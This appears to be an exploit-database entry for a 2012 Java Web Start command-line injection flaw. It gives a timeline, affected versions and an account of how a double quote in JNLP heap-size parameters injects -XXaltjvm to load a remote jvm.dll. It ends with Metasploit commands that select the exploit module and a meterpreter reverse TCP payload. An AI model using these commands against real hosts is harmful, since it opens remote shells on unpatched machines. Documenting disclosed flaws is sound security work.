Timeline :

Vulnerability fixed by Oracle the 2012-10-16
Details on the vulnerability provided by Rh0 the 2013-06-09
Metasploit PoC provided the 2013-06-12

PoC provided by :


Reference(s) :

Oracle Java SE Critical Patch Update Advisory – October 2012
Rh0 Pastebin

Affected version(s) :

JSE 7 Update 7 and before
JSE 6 Update 35 and before

Tested on Windows XP Pro with :

JSE 7 Update 7

Description :

This module exploits a flaw in the Web Start component of the Oracle Java Runtime Environment. Parameters intial-heap-size and max-heap-size in a JNLP file can contain a double quote which is not properly sanitized when creating the command line for javaw.exe. This allows the injection of the -XXaltjvm option to load a jvm.dll from a remote UNC path into the java process. Thus an attacker can execute arbitrary code in the context of a browser user. This flaw was fixed in Oct. 2012 and affects JSE 6 Update 35 and before, and JSE 7 Update 7 and before. In order for this module to work, it must be ran as root on a server that does not serve SMB. Additionally, the target host must have the WebClient service (WebDAV Mini-Redirector) enabled. Alternatively an UNC path containing a jvm.dll can be specified with an own SMB server.

Commands :

use exploit/windows/browser/java_ws_double_quote
set PAYLOAD windows/meterpreter/reverse_tcp